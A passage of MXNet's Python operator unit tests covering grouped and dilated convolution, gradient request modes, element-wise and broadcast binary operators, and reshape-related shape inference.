for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1._simple_bind(dev, x=shape)
exe2 = y2._simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv._bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv._bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
        # Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
            logging.error('input b hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
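        # For broadcast operands the analytic gradient has the broadcast shape;
        # reduce_op sums it back over the broadcast axes so that it matches the
        # shape of the corresponding input.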
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
o = y.forward(is_train=True)
y.backward([mx.nd.array(out, dtype=o[0].dtype)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
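        # d/da a**b = b * a**(b-1) and d/db a**b = a**b * ln(a), each times g_out.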
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
        # '%' is sensitive to the precision of the calculation; both operands are
        # cast to float64 above, so the plain numpy modulo is used as the baseline.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
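    # A unit impulse convolved with an all-ones kernel reproduces the (dilated)
    # kernel footprint, so both the output and the input gradient should sum to
    # prod(kernel_shape); the checks below rely on this.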
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net._bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net._bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
    impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at the center location (e.g. [0,0,16,16] in the 2D case)
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net._simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.fromjson(js)
